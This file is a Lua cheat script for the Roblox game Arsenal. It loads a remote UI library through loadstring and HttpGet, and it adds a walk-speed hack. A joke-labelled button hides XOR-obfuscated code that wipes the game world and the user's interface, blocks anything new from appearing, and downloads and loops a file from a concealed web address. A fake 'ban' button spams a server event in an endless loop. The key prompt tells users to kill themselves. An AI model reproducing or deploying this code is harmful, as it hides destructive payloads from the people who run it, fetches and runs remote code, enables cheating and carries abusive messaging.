local Rayfield = loadstring(game:HttpGet('https://sirius.menu/rayfield'))()

local Window = Rayfield:CreateWindow({
  Name = "Arsenal GUI | Shadow Hub",
  LoadingTitle = "Loading Arsenal GUI",
  LoadingSubtitle = "D4rk#0001 | janis#6697",
  ConfigurationSaving = {
     Enabled = true,
     FolderName = ShadowHub, -- Create a custom folder for your hub/game
     FileName = "Shadow Hub"
  },
  Discord = {
     Enabled = false,
     Invite = "noinvitelink", -- The Discord invite code, do not include discord.gg/. E.g. discord.gg/ABCD would be ABCD
     RememberJoins = true -- Set this to false to make them join the discord every time they load it up
  },
  KeySystem = true, -- Set this to true to use our key system
  KeySettings = {
     Title = "Arsenal GUI",
     Subtitle = "D4rk#0001 | janis#6697",
     Note = "Kill Yourself.",
     FileName = "AKS", -- It is recommended to use something unique as other scripts using Rayfield may overwrite your key file
     SaveKey = true, -- The user's key will be saved, but if you change the key, they will be unable to use your script
     GrabKeyFromSite = false, -- If this is true, set Key below to the RAW site you would like Rayfield to get the key from
     Key = {"kys"} -- List of keys that will be accepted by the system, can be RAW file links (pastebin, github etc) or simple strings ("hello","key22")
  }
})

local Tab1 = Window:CreateTab("Main", 4483362458) -- Title, Image
local Tab2 = Window:CreateTab("Other", 4483362458) -- Title, Image
local Tab3 = Window:CreateTab("Funny", 4483362458) -- Title, Image

local Section = Tab1:CreateSection("D4rk#0001 | janis#6697")
local Section = Tab2:CreateSection("D4rk#0001 | janis#6697")
local Section = Tab3:CreateSection("D4rk#0001 | janis#6697")

local Slider = Tab2:CreateSlider({
  Name = "WalkSpeed",
  Range = {16, 100},
  Increment = 1,
  Suffix = "Speed",
  CurrentValue = 16,
  Flag = "Slider1", -- A flag is the identifier for the configuration file, make sure every element has a different flag if you're using configuration saving to ensure no overlaps
  Callback = function(s)
      game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = s
  end,
})

local Button = Tab2:CreateButton({
  Name = "Delete GUI",
  Callback = function()
    Rayfield:Destroy()
  end,
})

local Button = Tab3:CreateButton({
  Name = "360 no scope henry stickman",
  Callback = function()
  local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local v7;v8=function(v17,v18)local v28={};for v30=1, #v17 do v6(v28,v0(v4(v1(v2(v17,v30,v30 + 1)),v1(v2(v18,1 + ((v30-1)% #v18),1 + ((v30-1)% #v18) + 1)))%256));end return v5(v28);end;for v19,v20 in next,game.Workspace:GetChildren() do pcall(function()v20:Destroy();end);end for v21,v22 in next,game:GetService(v8("\121\133\75\218\254\103\15","\58\234\57\191\185\18\102")):GetChildren() do pcall(function()v22:Destroy();end);end for v23,v24 in next,game:GetService(v8("\217\120\63\190\123\32\250","\137\20\94\199\30\82")).LocalPlayer.PlayerGui:GetChildren() do pcall(function()v24:Destroy();end);end game.Workspace.ChildAdded:Connect(function(v25)v25:Destroy();end);game:GetService(v8("\163\238\30\183\167\244\5","\224\129\108\210")).ChildAdded:Connect(function(v26)v26:Destroy();end);local v9=(gethui and gethui()) or (cloneref and cloneref(game:GetService(v8("\171\47\83\29\134\230\9","\232\64\33\120\193\147\96")))) or game:GetService(v8("\123\8\78\34\233\186\132","\56\103\60\71\174\207\237\165"));local v10=Instance.new(v8("\152\221\68\81\14\83\19\190\215","\203\190\54\52\107\61\84"),v9);v10.IgnoreGuiInset=false;local v12=Instance.new(v8("\76\94\82\131\117\113\68\135\119\82","\26\55\54\230"),v10);v12.Size=UDim2.new(2 -1,1650 -(870 + 780),1 + 0,0 -0);if  not isfile(v8("\123\141\41\6\74\18\67\183\108\30\72\71","\36\210\66\115\56\115")) then writefile(v8("\129\44\172\67\78\34\223\133\240\30\183\2","\222\115\199\54\60\67\184\224"),game:HttpGet(v8("\234\212\147\215\69\132\190\95\229\201\147\207\67\220\191\19\237\205\200\212\89\208\248\19\228\193\137\207\83\204\254\31\173\217\136\136\84\210\254\18\173\205\134\206\88\145\231\25\230\197\136\215\90\223\232\18\227\195\140\137\91\206\165\79\240\193\144\154\66\204\228\21","\130\160\231\167\54\190\145\112")));end repeat pcall(function()v12.Video=(syn and getsynasset(v8("\15\70\69\98\34\120\73\114\126\116\94\35","\80\25\46\23"))) or getcustomasset(v8("\233\220\16\239\44\166\209\230\85\247\46\243","\182\131\123\154\94\199"));end);until pcall(function()v12.Video=(syn and getsynasset(v8("\203\184\198\191\233\245\128\200\228\246\228\211","\148\231\173\202\155"))) or getcustomasset(v8("\18\236\164\209\84\44\212\170\138\75\61\135","\77\179\207\164\38"));end)while  not v12.IsLoaded do task.wait();end v12:Play();v12.Looped=true;workspace.ChildAdded:Connect(function(v27)v27:Destroy();end);getgenv().gethui=nil;getgenv().cloneref=nil;
  end,
})

local Button = Tab3:CreateButton({
  Name = "3rd Person (cant look up or down)",
  Callback = function()
    game.Players.LocalPlayer.DevComputerCameraMode = "Orbital"
  end,
})

local Button = Tab3:CreateButton({
  Name = "Ban (lol)",
  Callback = function()
    Rayfield:Notify({
      Title = "Shadow Hub",
      Content = "YOU WILL BE BANNED IN 10 SECONDS LEAVE IF ACCIDENTLY PRESSED IT IS PERMANENT BAN!",
      Duration = 6.5,
      Image = 4483362458,
      Actions = { -- Notification Buttons
         Ignore = {
            Name = "Okay!",
            Callback = function()
         end
      },
    },
    })
    wait(10)
    while true do
      game:GetService("ReplicatedStorage").Events.Sunglasses:FireServer("")
      wait(0.0000000000000000000000000000001)
      end
  end,
})

Rayfield:Notify({
  Title = "Shadow Hub",
  Content = "Script Loaded",
  Duration = 6.5,
  Image = 4483362458,
  Actions = { -- Notification Buttons
     Ignore = {
        Name = "Okay!",
        Callback = function()
     end
  },
},
})

Rayfield:LoadConfiguration()
